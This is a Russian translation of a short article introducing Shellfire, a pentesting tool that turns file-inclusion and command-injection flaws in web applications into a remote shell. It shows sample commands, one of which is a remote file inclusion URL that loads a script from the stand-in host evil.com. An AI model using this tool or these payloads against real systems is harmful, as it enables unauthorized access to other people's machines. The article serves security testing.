Использование уязвимостей встраиваемых файлов и командных инъекций: Shellfire
Shellfire – утилита, созданная для пентестеров и исследователей безопасности. Она может использоваться для повышения уязвимости веб-приложений с целью получения доступа к командной оболочке на удаленном компьютере.
Скачать Shellfire
Цель этой утилиты — представить чистую интерактивную псевдо-оболочку, которая будет выполнять команды на удаленной цели. Написанная и протестированная с помощью Python 2.7, эта утилита обеспечивает поддержку истории команд, SSL, нескольких методов протокола HTTP, базовой авторизации HTTP, встроенного веб-сервера для размещения кода эксплойта (который может использоваться с RFI), механизмов, помогающих в обновлении вашего соединения на истинную обратную оболочку на машинах Linux и многое другое.
Для использования shellfire, просто запустите его через python (или можно добавить разрешения на выполнение и запустить его напрямую). Например:
$ python shellfire.py [*] ShellFire v0.1 [*] Type '.help' to see available commands >>
Вы можете ввести .help в любое время для перечисления всех доступных команд, или просто добавить название команды, о которой вы хотите получить дополнительную информацию или узнать какие-либо конкретные детали. Например .help http
Краткое введение в эту утилиту можно найти здесь:
Чтобы начать работу, вам нужно указать, по крайней мере, URL вашей цели. Это должно выглядеть примерно следующим образом:
>> .url http://example.com/?path=http://evil.com/script.php
На данный момент у вас есть все для использования простых уязвимостей. Вы можете просто начать выполнять команды, и они будут отправлены прямо к цели. Для использования более сложных уязвимостей, вам может понадобиться указать дополнительные опции. Для примера давайте предположим, что вам необходимо отправить cookie с идентификатором сессии, чтобы использовать вашу цель. Вы можете добавить что-то вроде этого:
>> .cookies { "session_id" : "123456789" }
Дополнительные опции и информация о том, как их использовать может быть получена с помощью использования опции .help в оболочке. Код свободно доступен на github под лицензией BSD.
Перевод: Анна Давыдова
Источник: n0where.net
Это интересно: